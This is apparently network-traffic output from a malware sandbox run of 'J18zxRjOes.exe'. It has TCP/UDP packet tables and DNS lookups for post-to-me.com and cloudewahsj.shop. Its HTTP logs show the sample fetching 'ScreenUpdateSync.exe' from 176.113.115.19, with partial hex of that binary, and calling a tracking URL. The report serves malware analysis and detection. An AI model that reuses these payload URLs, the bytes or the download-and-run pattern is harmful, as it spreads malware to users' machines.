Jan 4, 2025 15:33:26.913288116 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.913299084 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.913347960 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.913415909 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.913428068 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.913439989 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.913453102 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.913461924 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.913494110 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.913710117 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.913719893 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.913753986 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.913777113 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:26.913863897 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.913875103 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:26.913913965 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.059426069 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.059453964 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.059546947 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.059561968 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.059582949 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.059596062 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.059604883 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.059611082 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.059624910 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.059642076 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.059670925 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.059943914 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.059957027 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.059995890 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.146208048 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.146317005 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.204211950 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.204240084 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.204334974 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.204509020 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.204524040 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.204536915 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.204555035 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.204569101 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.204581022 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.204586983 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.204592943 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.204607964 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.204628944 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.204653025 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.233032942 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.233206987 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.349348068 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.349365950 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.349451065 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.349458933 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.349505901 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.349523067 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.349536896 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.349550962 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.349561930 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.349567890 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.349574089 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.349602938 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.349632978 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.436134100 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.436211109 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.496557951 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.496573925 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.496622086 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.496646881 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.496726990 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.496746063 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.496758938 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.496871948 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.496884108 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.496896029 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.496937990 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.496982098 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:27.497122049 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.497134924 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:27.497173071 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:29.368268013 CET	49710	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:29.368309021 CET	443	49710	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:29.368485928 CET	49710	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:29.369494915 CET	49710	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:29.369509935 CET	443	49710	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:29.850902081 CET	443	49710	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:29.851063013 CET	49710	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:29.854054928 CET	49710	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:29.854060888 CET	443	49710	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:29.854459047 CET	443	49710	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:29.900433064 CET	49710	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:29.900504112 CET	49710	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:29.900604963 CET	443	49710	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:30.073133945 CET	80	49709	176.113.115.19	192.168.2.8
Jan 4, 2025 15:33:30.073411942 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:33:30.308820963 CET	443	49710	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:30.308943987 CET	443	49710	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:30.309273005 CET	49710	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:30.311079979 CET	49710	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:30.311100006 CET	443	49710	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:30.311155081 CET	49710	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:30.311161995 CET	443	49710	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:30.323175907 CET	49711	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:30.323220015 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:30.323303938 CET	49711	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:30.323548079 CET	49711	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:30.323561907 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:30.783077955 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:30.783154964 CET	49711	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:30.786403894 CET	49711	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:30.786412001 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:30.786778927 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:30.789962053 CET	49711	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:30.790004969 CET	49711	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:30.790071964 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.294980049 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.295049906 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.295078039 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.295106888 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.295140028 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.295144081 CET	49711	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:31.295159101 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.295207977 CET	49711	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:31.295224905 CET	49711	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:31.295233011 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.299647093 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.299680948 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.299710035 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.299722910 CET	49711	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:31.299731016 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.299773932 CET	49711	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:31.342020988 CET	49711	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:31.342029095 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.381295919 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.381325960 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.381351948 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.381375074 CET	49711	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:31.381382942 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.381427050 CET	49711	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:31.381443024 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.381484032 CET	49711	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:31.386646032 CET	49711	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:31.386653900 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.386663914 CET	49711	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:31.386667967 CET	443	49711	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.677042007 CET	49712	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:31.677086115 CET	443	49712	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:31.677220106 CET	49712	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:31.677551985 CET	49712	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:31.677567005 CET	443	49712	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:32.140932083 CET	443	49712	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:32.141057968 CET	49712	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:32.142405033 CET	49712	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:32.142414093 CET	443	49712	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:32.142652988 CET	443	49712	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:32.143922091 CET	49712	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:32.144067049 CET	49712	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:32.144108057 CET	443	49712	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:32.694832087 CET	443	49712	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:32.694921017 CET	443	49712	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:32.694967985 CET	49712	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:32.695110083 CET	49712	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:32.695118904 CET	443	49712	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:32.852755070 CET	49714	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:32.852798939 CET	443	49714	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:32.852940083 CET	49714	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:32.853359938 CET	49714	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:32.853374958 CET	443	49714	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:33.307785034 CET	443	49714	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:33.307851076 CET	49714	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:33.309087038 CET	49714	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:33.309097052 CET	443	49714	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:33.309334040 CET	443	49714	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:33.310506105 CET	49714	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:33.310638905 CET	49714	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:33.310663939 CET	443	49714	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:33.310748100 CET	49714	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:33.351342916 CET	443	49714	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:33.955544949 CET	443	49714	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:33.955635071 CET	443	49714	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:33.955856085 CET	49714	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:33.975245953 CET	49714	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:33.975272894 CET	443	49714	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:34.674685001 CET	49717	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:34.674719095 CET	443	49717	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:34.674807072 CET	49717	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:34.675096989 CET	49717	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:34.675112963 CET	443	49717	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:35.148034096 CET	443	49717	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:35.148124933 CET	49717	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:35.149274111 CET	49717	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:35.149286032 CET	443	49717	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:35.149585009 CET	443	49717	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:35.156110048 CET	49717	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:35.156253099 CET	49717	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:35.156326056 CET	443	49717	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:35.156404018 CET	49717	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:35.156413078 CET	443	49717	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:35.768559933 CET	443	49717	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:35.768722057 CET	443	49717	104.21.48.1	192.168.2.8
Jan 4, 2025 15:33:35.768769979 CET	49717	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:35.768922091 CET	49717	443	192.168.2.8	104.21.48.1
Jan 4, 2025 15:33:35.768937111 CET	443	49717	104.21.48.1	192.168.2.8
Jan 4, 2025 15:35:09.467849016 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:35:09.795559883 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:35:10.405791044 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:35:11.608378887 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:35:14.109088898 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:35:19.108071089 CET	49709	80	192.168.2.8	176.113.115.19
Jan 4, 2025 15:35:28.717669010 CET	49709	80	192.168.2.8	176.113.115.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 4, 2025 15:33:19.622694969 CET	50304	53	192.168.2.8	1.1.1.1
Jan 4, 2025 15:33:19.928783894 CET	53	50304	1.1.1.1	192.168.2.8
Jan 4, 2025 15:33:29.349926949 CET	65229	53	192.168.2.8	1.1.1.1
Jan 4, 2025 15:33:29.363466978 CET	53	65229	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 4, 2025 15:33:19.622694969 CET	192.168.2.8	1.1.1.1	0xe73b	Standard query (0)	post-to-me.com	A (IP address)	IN (0x0001)	false
Jan 4, 2025 15:33:29.349926949 CET	192.168.2.8	1.1.1.1	0x9924	Standard query (0)	cloudewahsj.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 4, 2025 15:33:19.928783894 CET	1.1.1.1	192.168.2.8	0xe73b	No error (0)	post-to-me.com	104.21.56.70	A (IP address)	IN (0x0001)	false
Jan 4, 2025 15:33:19.928783894 CET	1.1.1.1	192.168.2.8	0xe73b	No error (0)	post-to-me.com	172.67.179.207	A (IP address)	IN (0x0001)	false
Jan 4, 2025 15:33:29.363466978 CET	1.1.1.1	192.168.2.8	0x9924	No error (0)	cloudewahsj.shop	104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 4, 2025 15:33:29.363466978 CET	1.1.1.1	192.168.2.8	0x9924	No error (0)	cloudewahsj.shop	104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 4, 2025 15:33:29.363466978 CET	1.1.1.1	192.168.2.8	0x9924	No error (0)	cloudewahsj.shop	104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 4, 2025 15:33:29.363466978 CET	1.1.1.1	192.168.2.8	0x9924	No error (0)	cloudewahsj.shop	104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 4, 2025 15:33:29.363466978 CET	1.1.1.1	192.168.2.8	0x9924	No error (0)	cloudewahsj.shop	104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 4, 2025 15:33:29.363466978 CET	1.1.1.1	192.168.2.8	0x9924	No error (0)	cloudewahsj.shop	104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 4, 2025 15:33:29.363466978 CET	1.1.1.1	192.168.2.8	0x9924	No error (0)	cloudewahsj.shop	104.21.64.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

post-to-me.com

cloudewahsj.shop

176.113.115.19

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49709	176.113.115.19	80	6288	C:\Users\user\Desktop\J18zxRjOes.exe

Timestamp	Bytes transferred	Direction	Data
Jan 4, 2025 15:33:21.088593960 CET	85	OUT	GET /ScreenUpdateSync.exe HTTP/1.1 User-Agent: ShareScreen Host: 176.113.115.19
Jan 4, 2025 15:33:21.822628975 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 14:33:21 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Sat, 04 Jan 2025 14:30:02 GMT ETag: "4f200-62ae23b0f3374" Accept-Ranges: bytes Content-Length: 324096 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1a 24 02 80 5e 45 6c d3 5e 45 6c d3 5e 45 6c d3 e3 0a fa d3 5f 45 6c d3 40 17 e8 d3 7b 45 6c d3 40 17 f9 d3 44 45 6c d3 40 17 ef d3 20 45 6c d3 79 83 17 d3 59 45 6c d3 5e 45 6d d3 24 45 6c d3 40 17 e6 d3 5f 45 6c d3 40 17 f8 d3 5f 45 6c d3 40 17 fd d3 5f 45 6c d3 52 69 63 68 5e 45 6c d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c4 cc 27 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 04 00 00 38 01 00 00 00 00 00 5f 44 00 00 00 10 00 00 00 30 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 59 93 05 00 02 00 00 81 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$$^El^El^El_El@{El@DEl@ ElyYEl^Em$El@_El@_El@_ElRich^ElPEL'e8_D0@Y#Pox-@.textR `.data0`"@.rsrcp@@
Jan 4, 2025 15:33:21.822660923 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 25 04 00 12 25 04 00 26 25 04 00 3c 25 04 00 54 25 04 00 6c 25 04 00 80 25 04 00 9e 25 04 00 b2 25 04 00 cc 25 04 00 e2 25 Data Ascii: %%&%<%T%l%%%%%%%&&.&B&R&n&&&&&&&&'',':'J'^'r''''D,4,,,0(L(j(\|((((
Jan 4, 2025 15:33:21.822752953 CET	1236	IN	Data Raw: b2 28 04 00 c2 28 04 00 d8 28 04 00 ec 28 04 00 00 29 04 00 0c 29 04 00 1a 29 04 00 26 29 04 00 34 29 04 00 3e 29 04 00 54 29 04 00 60 29 04 00 76 29 04 00 82 29 04 00 9a 29 04 00 b2 29 04 00 be 29 04 00 d0 29 04 00 de 29 04 00 f0 29 04 00 08 2a Data Ascii: (((()))&)4)>)T)`)v))))))))*0Jdv*******++"+.+@+L+\+n++++++++,(''';@~f@kk@
Jan 4, 2025 15:33:21.822767019 CET	1236	IN	Data Raw: 65 20 66 6f 72 20 73 74 64 69 6f 20 69 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 0d 0a 00 00 00 00 52 36 30 32 35 0d 0a 2d 20 70 75 72 65 20 76 69 72 74 75 61 6c 20 66 75 6e 63 74 69 6f 6e 20 63 61 6c 6c 0d 0a 00 00 00 52 36 30 32 34 0d 0a 2d 20 6e Data Ascii: e for stdio initializationR6025- pure virtual function callR6024- not enough space for _onexit/atexit tableR6019- unable to open console deviceR6018- unexpected heap errorR6017- unexpected multithread loc
Jan 4, 2025 15:33:21.822777987 CET	448	IN	Data Raw: 63 74 69 76 65 50 6f 70 75 70 00 00 47 65 74 41 63 74 69 76 65 57 69 6e 64 6f 77 00 4d 65 73 73 61 67 65 42 6f 78 41 00 55 53 45 52 33 32 2e 44 4c 4c 00 00 e0 96 44 00 38 97 44 00 1b 86 40 00 ba 85 40 00 ba 85 40 00 01 02 03 04 05 06 07 08 09 0a Data Ascii: ctivePopupGetActiveWindowMessageBoxAUSER32.DLLD8D@@@ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~=_nextafter_logb_yn_y1_y0frexp
Jan 4, 2025 15:33:21.822814941 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: (((((
Jan 4, 2025 15:33:21.822829008 CET	1236	IN	Data Raw: 02 01 02 01 02 01 01 01 00 00 00 00 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdef
Jan 4, 2025 15:33:21.822848082 CET	448	IN	Data Raw: 2e 64 6c 6c 00 00 00 00 30 00 00 00 30 00 00 00 6d 73 69 6d 67 33 32 2e 64 6c 6c 00 62 61 64 20 61 6c 6c 6f 63 61 74 69 6f 6e 00 00 6a 0f 44 00 38 2e 40 00 75 0d 44 00 22 1b 44 00 62 61 64 20 65 78 63 65 70 74 69 6f 6e 00 00 00 b8 2e 40 00 2f 1b Data Ascii: .dll00msimg32.dllbad allocationjD8.@uD"Dbad exception.@/D"DUnknown exception.@`Dcsm Complete Object Locator' Class Hierarchy Descriptor' Base Class Array' Base Class Des
Jan 4, 2025 15:33:21.969377041 CET	1236	IN	Data Raw: 72 75 63 74 6f 72 20 66 6f 72 20 27 00 00 00 00 60 64 79 6e 61 6d 69 63 20 69 6e 69 74 69 61 6c 69 7a 65 72 20 66 6f 72 20 27 00 00 60 65 68 20 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 Data Ascii: ructor for '`dynamic initializer for '`eh vector vbase copy constructor iterator'`eh vector copy constructor iterator'`managed vector destructor iterator'`managed vector constructor iterator'`placement delete[] closure'`pl
Jan 4, 2025 15:33:21.969398975 CET	224	IN	Data Raw: 50 2b 40 00 4c 2b 40 00 48 2b 40 00 44 2b 40 00 40 2b 40 00 3c 2b 40 00 38 2b 40 00 34 2b 40 00 30 2b 40 00 2c 2b 40 00 28 2b 40 00 24 2b 40 00 20 2b 40 00 1c 2b 40 00 18 2b 40 00 14 2b 40 00 10 2b 40 00 0c 2b 40 00 08 2b 40 00 04 2b 40 00 00 2b Data Ascii: P+@L+@H+@D+@@+@<+@8+@4+@0+@,+@(+@$+@ +@+@+@+@+@+@+@+@+@@@@@@@@@@@@@@@@@@p@P@0@*@)@)@)@)@l)@L)@$)@)@(@(@(@(@(@(@
Jan 4, 2025 15:33:21.969557047 CET	1236	IN	Data Raw: a4 28 40 00 94 28 40 00 78 28 40 00 58 28 40 00 30 28 40 00 08 28 40 00 e0 27 40 00 b4 27 40 00 98 27 40 00 74 27 40 00 50 27 40 00 24 27 40 00 f8 26 40 00 dc 26 40 00 2a 1b 40 00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: (@(@x(@X(@0(@(@'@'@'@t'@P'@$'@&@&@*@H

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49708	104.21.56.70	443	6288	C:\Users\user\Desktop\J18zxRjOes.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 14:33:20 UTC	90	OUT	GET /track_prt.php?sub=0&cc=DE HTTP/1.1 User-Agent: ShareScreen Host: post-to-me.com
